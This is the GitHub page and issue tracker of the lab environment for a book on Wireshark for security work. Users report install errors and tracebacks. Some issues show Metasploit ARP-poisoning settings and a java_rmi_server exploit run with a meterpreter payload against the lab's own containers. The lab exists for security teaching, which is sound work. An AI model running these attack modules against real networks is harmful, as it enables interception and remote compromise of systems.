w4sp-book / w4sp-lab

Lab environment for the Wireshark for Security Professionals book

Home Page: https://github.com/w4sp-book/w4sp-lab/wiki/Lab-Installation

ApacheConf 0.41% HTML 0.72% Python 4.09% JavaScript 92.91% CSS 1.87%

w4sp-lab's Introduction

!!! PLEASE REFER TO THE MOST RECENT UPDATED INSTALLATION INSTRUCTIONS HERE !!!!

This is the lab environment for the Wireshark for Security Professionals book. The lab is built on top of Docker and Kali Linux and provides a realistic network with numerous services useful for learning security fundamentals with Wireshark.

Both Kali and the w4sp-lab are moving targets and are subject to change. Always refer to the wiki for the most recent information regarding working with the lab.

w4sp-lab's Issues

graphviz lua script error - "module 'gv' not found:"

Hi,
When I try to run the lua script using graphviz I get the following error:

w4sp-lab@w4sp:~$ tshark -q -X lua_script:graphviz.lua
tshark: Lua: Error during loading:
[string "graphviz.lua"]:2: module 'gv' not found:
no field package.preload['gv']
no file '/gv.lua'
no file '/home/w4sp-lab/.config/wireshark/plugins/gv.lua'
no file '/usr/lib/x86_64-linux-gnu/wireshark/plugins/2.4.2/gv.lua'
no file '/usr/local/share/lua/5.2/gv.lua'
no file '/usr/local/share/lua/5.2/gv/init.lua'
no file '/usr/local/lib/lua/5.2/gv.lua'
no file '/usr/local/lib/lua/5.2/gv/init.lua'
no file '/usr/share/lua/5.2/gv.lua'
no file '/usr/share/lua/5.2/gv/init.lua'
no file './gv.lua'
no file '/usr/local/lib/lua/5.2/gv.so'
no file '/usr/lib/x86_64-linux-gnu/lua/5.2/gv.so'
no file '/usr/lib/lua/5.2/gv.so'
no file '/usr/local/lib/lua/5.2/loadall.so'
no file './gv.so'
Capturing on 'any'

Thank you,
Mike

Chapter 6: Unable to start sploit

I seem to be missing the sploitable image.

['docker', 'run', '-id', '--privileged', '--name', 'sploit', '--hostname', 'sploit', '--net=none', 'w4sp/labs:sploitable']
Unable to find image 'w4sp/labs:sploitable' locally

trouble with the mitm lab

Here is what I did

  • double-click 'vic1' to get terminal and wireshark
  • Select the top interface to start capturing
  • set the filter in wireshark to show only the ftp protocol
  • Note: I can see ftp traffic to two different FTP servers, one on the 192.100.x.x network and one on the 10.100.x.x network
  • I opened the terminal for the kali node from the kali desktop and not the network diagram.
  • In order to attempt to see the mitm attack work, I started the capture on the 'kali' wireshark and set the filter to 'ftp'. In the beginning, I didn’t expect to see any traffic on the ‘kali’ wireshark.
  • From the kali terminal, start Metasploit with 'sudo msfconsole'
  • at the 'msf>' prompt enter 'use auxilliary/spoof/arp/arp_poisoning'
  • I sent three pieces of information:
      ◦ DHOSTS points to the ip of the host to target (vic1)
      ◦ SHOSTS points to the ip address to spoof (the gateway ip is 192.100.200.1)
      ◦ LOCALSIP points to the ip address of where we want to send the spoofed traffic (kali)
  • enter 'set DHOSTS X.X.X.X' where the 'x.x.x.x' is replaced with the ip address for vic1
  • enter 'exploit'
  • I expected to see ftp traffic in the kali wireshark, but none appeared.
  • Unexpectedly, I did see the ftp traffic from vic1 change from seeing ftp traffic to both the 192.x.x.x and 10.x.x.x networks to only the local network, 192.x.x.x

I've been looking at this on and off for a week, making sure I have the right IP addresses in each slot (as far as I can tell) and I get the same results each time. Am I missing a step?

Here are the settings

Basic options:

Name           Current Setting  Required  Description
----           ---------------  --------  -----------
AUTO_ADD       false            yes       Auto add new host when discovered by the listener
BIDIRECTIONAL  false            yes       Spoof also the source with the dest
DHOSTS         192.100.200.160  yes       Target ip addresses
INTERFACE                       no        The name of the interface
LISTENER       true             yes       Use an additional thread that will listen for arp requests to reply as fast as possible
SHOSTS         192.100.200.1    yes       Spoofed ip addresses
SMAC                            no        The spoofed mac

Problem starting Wireshark

I have the lab all set up - and as Chapter 4 page 134 states and expects when starting Wireshark - I had the error:
'couldn't run /usr/bin dumpcap in child process permission denied'

The remedy listed on page 134 has a typo - it says:
sudo setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /user/bin/dumpcap

of course that throws an error - the folder is: /usr/bin/ not: /user/bin
So I ran the command as the folder should be with /usr/bin/dumpcap
Double checking - there is no user/bin created in the labs, so the call should be to /usr/bin/.

But then when I went to start Wireshark I get the same error - tried running it before and after Wireshark is loaded, so I can't do the labs.
Anybody run into this or have a suggestion? Looks like somebody put a lot of work into this - hate to see it wasted effort... on their part and mine - already read the whole book. Loved it - but frustrated and disappointed I can't get to run the promising labs and run Wireshark at the same time... kind of funny since it is a book about Wireshark.
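
Added example (not from the book, the lab code, or the poster above): a Python check of what `getcap` reports for dumpcap, which shows whether the setcap remedy discussed in this issue actually took effect. The function names and the sample getcap lines are constructed for illustration, and requiring only the effective and permitted flags (the quoted command also sets the inheritable one) is an assumption.

```python
import re
import shutil
import subprocess

# The two capabilities named in the setcap remedy quoted above.
NEEDED = ("cap_net_raw", "cap_net_admin")

# One clause of libcap's text form: an optional capability list followed by
# one or more actions such as "+eip", "=ep" or "-i".
_CLAUSE = re.compile(r"^([a-z0-9_,]*)((?:[=+-][eip]*)+)$")
_ACTION = re.compile(r"([=+-])([eip]*)")

# Constructed sample lines (not captured from the lab):
SAMPLE_OLD = "/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip"  # older libcap layout
SAMPLE_NEW = "/usr/bin/dumpcap cap_net_admin,cap_net_raw=eip"    # newer libcap layout
SAMPLE_PARTIAL = "/usr/bin/dumpcap cap_net_raw=eip"              # one capability missing
SAMPLE_PERMITTED_ONLY = "/usr/bin/dumpcap cap_net_admin,cap_net_raw=p"


def parse_getcap_line(line):
    """Return (path, {capability: set of flags}) for the NEEDED capabilities.

    Assumes the path contains no whitespace. The bare "=" that older getcap
    versions print after the path parses as a "clear everything" clause,
    which is harmless at the start of the line.
    """
    parts = line.split()
    if not parts:
        raise ValueError("empty getcap line")
    path, clauses = parts[0], parts[1:]
    flags = {cap: set() for cap in NEEDED}
    for clause in clauses:
        match = _CLAUSE.match(clause)
        if match is None:
            raise ValueError("unrecognised capability clause: %r" % clause)
        names, actions = match.groups()
        # An empty list or "all" applies the action to every capability.
        if names in ("", "all"):
            targets = NEEDED
        else:
            targets = [c for c in names.split(",") if c in flags]
        for op, letters in _ACTION.findall(actions):
            for cap in targets:
                if op == "=":
                    flags[cap] = set(letters)
                elif op == "+":
                    flags[cap] |= set(letters)
                else:
                    flags[cap] -= set(letters)
    return path, flags


def check_dumpcap_caps(getcap_output, expected_path="/usr/bin/dumpcap", required="ep"):
    """Return a list of problems; an empty list means the capabilities are in place."""
    lines = [l for l in getcap_output.splitlines() if l.strip()]
    if not lines:
        # getcap prints nothing when the file carries no capabilities, which
        # is the state left behind when setcap was pointed at a wrong path.
        return ["no file capabilities set on %s" % expected_path]
    path, flags = parse_getcap_line(lines[0])
    problems = []
    if path != expected_path:
        problems.append("capabilities reported for %s, not %s" % (path, expected_path))
    for cap in NEEDED:
        missing = set(required) - flags[cap]
        if missing:
            problems.append("%s lacks flag(s) %s" % (cap, "".join(sorted(missing))))
    return problems


if __name__ == "__main__":
    if shutil.which("getcap") is None:
        # No getcap on this machine: fall back to the constructed samples.
        for sample in (SAMPLE_OLD, SAMPLE_NEW, SAMPLE_PARTIAL, ""):
            print(repr(sample), "->", check_dumpcap_caps(sample) or "OK")
    else:
        result = subprocess.run(["getcap", "/usr/bin/dumpcap"],
                                capture_output=True, text=True)
        print(check_dumpcap_caps(result.stdout) or "OK")
```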

Chapter 5: MitM arp.p

First off, love the book and lab!

So throwing the ARP aux. poisoning results in the error of Msf::OptionValidateError etc. etc. RHOSTS.
I know the RHOSTS should be set. It's not explained in the book.
Also the IP address discovery of ping vic1.lab doesn't resolve for me.
Additional thought: I know the IP address can be discovered by the GUI with a mouse; however, vic1 isn't discovered through enumeration. How would I gather the existence of vic1.lab without the GUI? I wouldn't know to ping vic1.lab either.
I'm sure the solution to my problem is a Google search away with the whole RHOSTS thing.
I assume the target address range = RHOSTS (should be obvious 10.0.0.0/24, but I self-doubt) ;(

Poor Amazon feedback

To those who cannot install the lab, can I suggest you consider leaving negative feedback on Amazon. I cannot make use of this book while the lab does not work and the writers/publishers do not seem to be in any hurry to fix this. Maybe multiple negative reviews on Amazon is the encouragement they need.

installing w4sp-lab new error

Il pacchetto "docker-engine" non ha candidati da installare
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in <module>
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 216, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 394, in __init__
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
w4sp-lab@kali:~/Downloads/w4sp-lab-master$

W4SP Lab Install Problem - Hopefully not ID10T

Howdy!

I've been following the instructions on the wiki page as of 8/12/2017 (versus what's written in the book) and am receiving the following error when I run the command "sudo python w4sp_webapp.py" as w4sp-lab user. Any ideas what the problem might be?

kali_w4sp-2017-08-12-22-17-35

Network is Unreachable

After starting the webapp.py the network switches to bridged network access with the docker0. I think this is also blocking the network? Anytime I ping a machine I get the Network is Unreachable reply in the command line.

Chapter 6 - Offensive Wireshark - login to Metasploitable VM

Hi,
I'm currently working through Chapter 6 and reached page 182. It mentions logging into Metasploitable VM with msfadmin/msfadmin credentials however I'm not sure how to connect to this VM. I've tried telnet and SSH but connections refused. Apologies if it is obvious !!

BTW great book and lab. Really enjoying working through the exercises.

Thanks & Best Regards,
Mike

w4sp-lab setup error

w4sp

I bought a book and followed 'w4sp-lab'. However, clicking the installer will result in an error. I live in Korea and I can not speak English. Please explain easily.
The first works fine, but the second time you run, an error occurs.

Lab Install Help Requested (sorry I'm n00b at this!)

Thanks so much for this lab and the book! ;-)
On the lab install, I am getting this error. (see below)
I'm reading the book and I really want this lab to work!

P.S. I read through the other errors, but didn't see this one. Apologies if I missed it.

Begin Error Text***************************************************

[*] Not enough w4sp/labs images found, building now
/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
The command '/bin/sh -c apt-get install -y suricata logstash openjdk-7-jre-headless' returned a non-zero code: 100
Traceback (most recent call last):
File "w4sp_webapp.py", line 499, in <module>
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 223, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']' returned non-zero exit status 100

Iceweasel/firefox not logging to key log file

Hi,
I've done the following
root@w4sp:~/Desktop# export SSLKEYLOGFILE='/root/Desktop/session.log' (tried /root first)
In same shell
root@w4sp:~/Desktop# open firefox https://wikipedia.org
No file created.
Tried creating a file first
root@w4sp:~/Desktop# nano session.log
root@w4sp:~/Desktop# chmod -R 777 session.log

Nothing written to file.
Are there any other changes needed in Firefox ?
Thank you.
Mike

w4sp_webapp execute Error!

w4sp-lab@kali:~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
['which', 'dumpcap']
Traceback (most recent call last):
File "w4sp_webapp.py", line 441, in <module>
w4sp.check_dumpcap()
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 13, in check_dumpcap
dumpcap = r('which dumpcap').strip()
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 223, in check_output
raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['which', 'dumpcap']' returned non-zero exit status 1

I don't execute w4sp_webap.py
what should I do?

It's all a bit shit, really!

Bought the book and trying to install the lab. Errors galore.
I'm clearly not the only person with problems - frustrated at wasting time trying to get a lab to work on an ISO when I'd prefer to spend my time studying, rather than troubleshooting/fixing.
Not having a pop at the helpful people who try to offer good advice in forums for the benefit of their peers. I do, however, feel let down by the book's writers and publishers. If this is all so problematic, why don't you just develop your own static ISO with all included, that actually works? Or provide the pcaps for download?

issue running Java RMI exploit

I'm not able to run the java_rmi_server exploit successfully, each time, I get a message "Meterpreter session X closed. Reason: Died"

Looking at the wireshark traces on port 4444 and using (follow>tcp stream), I see what appears to be the staging jar files being sent, and then the connection starts to show a few [psh,ack] and then [rst,ack]. Does this show the meterpreter dying?

Regardless, is there something I can do to get this exploit to work?

===============================
Wireshark Captures
java_rmi_server.zip
java_rmi_server.port4444.zip

===============================
Metasploit console

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set RHOST 10.100.200.138
RHOST => 10.100.200.138
msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/bind_tcp
PAYLOAD => java/meterpreter/bind_tcp
msf exploit(java_rmi_server) > exploit

[*] Started bind handler
[*] 10.100.200.138:1099 - Using URL: http://0.0.0.0:8080/F2PdPb
[*] 10.100.200.138:1099 - Local IP: http://192.100.200.166:8080/F2PdPb
[*] 10.100.200.138:1099 - Server started.
[*] 10.100.200.138:1099 - Sending RMI Header...
[*] 10.100.200.138:1099 - Sending RMI Call...
[*] 10.100.200.138:1099 - Replied to request for payload JAR
[*] Sending stage (49645 bytes) to 10.100.200.138
[*] Meterpreter session 1 opened (192.100.200.166:43545 -> 10.100.200.138:4444) at 2017-05-01 20:54:21 -0500
[*] 10.100.200.138 - Meterpreter session 1 closed. Reason: Died
[-] 10.100.200.138:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.100.200.138:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(java_rmi_server) >
[-] Meterpreter session 1 is not valid and will be closed

w4sp-lab Installation problem

w4sp-lab-issue-2

I am using the below command and still getting error "returned a non-zero code" (see attached).

sudo python w4sp_webapp.py

Kindly help. I am stuck. Thank you!

Lab fails to setup [Errno 32] Broken pipe

Lab fails to setup. It gets most of the way before it encounters a (presumably) fatal error and stops.

Exception happened during processing of request from ('127.0.0.1', 52164)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

Assuming with the "broken pipe" there's some issue with the connection being closed.

Installation Error

Hi,

I am trying to install on the latest VM of Kali, i.e. 2017.3, and am receiving the following error.

Any advice?


Fetched 31.3 MB in 1min 25s (365 kB/s)
E: Failed to fetch http://kali.mirror.garr.it/mirrors/kali/pool/main/a/aufs/aufs-dkms_4.13+20171002-1_amd64.deb Connection failed [IP: 90.147.164.69 80]
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in <module>
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 212, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 390, in __init__
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1025, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory

Exception happened during processing of request from ('127.0.0.1', 51090)

Can you help me to solve this?
The problem happened when I push the Setup button once the lab is launched in the browser :(

Exception happened during processing of request from ('127.0.0.1', 51090)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

Installing W4SP lab

Command correction on PG 51. To get the lab installed make sure you use sudo.

Old command
python w4sp_webapp.py

Correct command
sudo python w4sp_webapp.py

Traceback Error

I've been getting this error.

~/Downloads/w4sp-lab-master$ sudo python w4sp_webapp.py
Traceback (most recent call last):
File "w4sp_webapp.py", line 435, in <module>
if os.getlogin() != 'w4sp-lab':
OSError: [Errno 2] No such file or directory

Not sure why. Any help?

I am running the latest Kali linux. I have also updated and upgraded the kali linux

Question - ELK not logging sploit traffic

Hi,
When running sploit and ELK together should the ELK machine log any traffic to/from the sploit target machine ? I'm not seeing any traffic to/from the sploit IP address when I search the logs in Kibana.

Thank you.
Mike

I got an error with setting up the lab

Not sure what's going on but I received a really long error. There was more to it but I'm just posting the end part. I hope someone is able to help me with this. Thank you in advance.

Exception happened during processing of request from ('127.0.0.1', 56852)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

5436 connected 5489
5436 connected 5538
5436 connected 5603
5436 connected 5671
5436 connected 5750
5489 connected 6130
5538 connected 6130
6130 connected 6193
6130 connected 6254
6130 connected 6319
6130 connected 6387
{'nodes': [{'title': u'br0 : 192.100.200.62 <br>', 'id': '5436', 'label': 'sw1'}, {'title': u'r1_0 : 192.100.200.40 <br>', 'id': '5489', 'label': 'r1'}, {'title': u'r2_0 : 192.100.200.74 <br>', 'id': '5538', 'label': 'r2'}, {'title': u'vic1_0 : 192.100.200.198 <br>', 'id': '5603', 'label': 'vic1'}, {'title': u'smb1_0 : 192.100.200.108 <br>', 'id': '5671', 'label': 'smb1'}, {'title': u'ftp1_0 : 192.100.200.130 <br>', 'id': '5750', 'label': 'ftp1'}, {'title': u'br0 : 10.100.200.61 <br>', 'id': '6130', 'label': 'sw2'}, {'color': 'rgb(0,255,0)', 'title': u'root : 192.168.0.198 <br>inet_0 : 10.100.200.54 <br>', 'id': '6193', 'label': 'inet'}, {'title': u'vic4_0 : 10.100.200.111 <br>', 'id': '6254', 'label': 'vic4'}, {'title': u'smb2_0 : 10.100.200.128 <br>', 'id': '6319', 'label': 'smb2'}, {'title': u'ftp2_0 : 10.100.200.179 <br>', 'id': '6387', 'label': 'ftp2'}, {'color': 'rgb(204,0,0)', 'title': u'docker0 : 172.17.0.1 <br>w4sp_lab : 192.100.200.200 <br>', 'id': 1, 'label': ' kali '}], 'edges': [{'to': '5489', 'from': '5436'}, {'to': '5538', 'from': '5436'}, {'to': '5603', 'from': '5436'}, {'to': '5671', 'from': '5436'}, {'to': '5750', 'from': '5436'}, {'to': '5436', 'from': 1}, {'to': '6130', 'from': '5489'}, {'to': '6130', 'from': '5538'}, {'to': '6193', 'from': '6130'}, {'to': '6254', 'from': '6130'}, {'to': '6319', 'from': '6130'}, {'to': '6387', 'from': '6130'}]}
127.0.0.1 - - [14/Feb/2018 16:49:36] "GET /getnet HTTP/1.1" 200 -

Exception happened during processing of request from ('127.0.0.1', 56854)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

Metasploitable no longer starting

Hi,
Metasploitable not starting.
I now get the following error:
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'run', '-id', '--privileged', '--name', 'sploit', '--hostname', 'sploit', '--net=none', 'w4sp/labs:sploitable']' returned non-zero exit status 125
Exception AttributeError: "'container' object has no attribute 'id'" in <bound method container.__del__ of <w4sp_app.container.container object at 0x7f9708992a90>> ignored
127.0.0.1 - - [14/Jan/2018 09:36:33] "GET /sploit HTTP/1.1" 500 -

Sploit doesn't appear in network diagram.

Thanks,
Mike

apt-get install netifaces fail

Today, apt-get install netifaces fails.
It seems that apt-get cannot find python-netifaces anymore.
So, I was wondering. Is it worth keeping the code below?

w4sp_app/container.py:22:        subprocess.check_call(['apt-get', 'install', 'python-netifaces'])
w4sp_app/container.py:23:        import netifaces

I mean, the only reason to keep this code is to catch an error from pip install.
If pip install fails, this one will stop the installation script. Which is good.

I think I'll change this code a little bit.

I'm running:
Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 GNU/Linux

error installing w4sp-lab

E: Impossibile impostare il blocco /var/lib/dpkg/lock-frontend - open (11: Risorsa temporaneamente non disponibile)
E: Impossibile acquisire il blocco sul frontend dpkg (/var/lib/dpkg/lock-frontend). Un altro processo potrebbe tenerlo occupato.
Failed to start docker.service: Unit docker.service not found.
Traceback (most recent call last):
File "w4sp_webapp.py", line 480, in <module>
images = subprocess.check_output(['docker', 'images']).split('\n')
File "/usr/lib/python2.7/subprocess.py", line 216, in check_output
process = Popen(stdout=PIPE, *popenargs, **kwargs)
File "/usr/lib/python2.7/subprocess.py", line 394, in __init__
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory

issue on second startup

Hello. So, I have a strange issue. I can get through the install no problem and the lab environment works just fine. I install, hit setup, refresh the screen and things seem to work fine. However, I then shutdown via the browser GUI and that seems to work. Something that is odd though is that the terminal fails to return to the prompt. Thus, I have tried to either hit ctrl-c or just X the terminal out.

Upon reboot or starting the Kali VM the lab will no longer work. I get the browser GUI but when I hit setup something happens and the button that used to be labeled "setup" becomes "error" and there is nothing I can do about it. Hitting the error button quickly flashes an error window that pops up and disappears faster than I can read the message and the terminal cycles through some code but there is no way to work the lab. My only option is to go to the previous VM snapshot that I made prior to installing the lab and reinstall the lab. Then again, I can use the lab. If this didn't take 15 minutes each time it wouldn't be that big of a deal but it does and makes things a huge pain.

Here is the terminal window upon restart of the program when I start getting errors. Hopefully you can help me out!!! Thanks.

['which', 'dumpcap']
['getcap', '/usr/bin/dumpcap']
[*] Caps set correctly on dumpcap
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Not enough w4sp/labs images found, building now
/root/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:victims', 'victims']
['docker', 'build', '-t', 'w4sp/labs:samba', 'samba']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:elk', 'elk']
['docker', 'build', '-t', 'w4sp/labs:ftp_tel', 'ftp_tel']
['docker', 'build', '-t', 'w4sp/labs:inet', 'inet']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
[*] Lab Launched, Starting Browser
[*] Do not close this terminal. Closing Terminal will terminate lab.
127.0.0.1 - - [26/Sep/2017 11:04:56] "GET / HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>docker0 : 172.17.0.1 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /is_ips HTTP/1.1" 404 -
127.0.0.1 - - [26/Sep/2017 11:04:57] "GET /favicon.ico HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
['ifconfig', '-a']
['ip', 'link', 'delete', 'docker0:']
['ip', 'link', 'delete', 'eth0:']
RTNETLINK answers: Operation not supported
['ip', 'link', 'delete', 'lo:']
RTNETLINK answers: Operation not supported
['ip', 'netns']
['pkill', 'dhclient']
['ifconfig', '-a']
['service', 'network-manager', 'start']
['service', 'networking', 'restart']
['service', 'docker', 'restart']
Job for docker.service failed.
See "systemctl  status docker.service" and "journalctl  -xe" for details.
Traceback (most recent call last):
  File "w4sp_webapp.py", line 163, in setup
    w4sp.setup_network2('eth0')
  File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
    docker_clean()
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 148, in docker_clean
    r('service docker restart')
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
    return subprocess.check_output(cmd)
  File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['service', 'docker', 'restart']' returned non-zero exit status 1

127.0.0.1 - - [26/Sep/2017 11:05:07] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:07] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:08] "GET /is_ips HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Did not shutdown cleanly, trying again
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
Traceback (most recent call last):
  File "w4sp_webapp.py", line 163, in setup
    w4sp.setup_network2('eth0')
  File "/root/Downloads/w4sp-lab-master/w4sp.py", line 39, in setup_network2
    docker_clean()
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 114, in docker_clean
    out = r('docker ps -aq --filter label=w4sp=true').split('\n')[:-1]
  File "/root/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
    return subprocess.check_output(cmd)
  File "/usr/lib/python2.7/subprocess.py", line 219, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command '['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']' returned non-zero exit status 1

127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /setup HTTP/1.1" 200 -
{'nodes': [{'color': 'rgb(204,0,0)', 'title': u'eth0 : 192.168.1.119 <br>', 'id': 1, 'label': ' kali '}], 'edges': []}
127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /getnet HTTP/1.1" 200 -
127.0.0.1 - - [26/Sep/2017 11:05:14] "GET /is_ips HTTP/1.1" 404 -
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
[*] Did not shutdown cleanly, trying again
['docker', 'ps', '-aq', '--filter', 'label=w4sp=true']
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
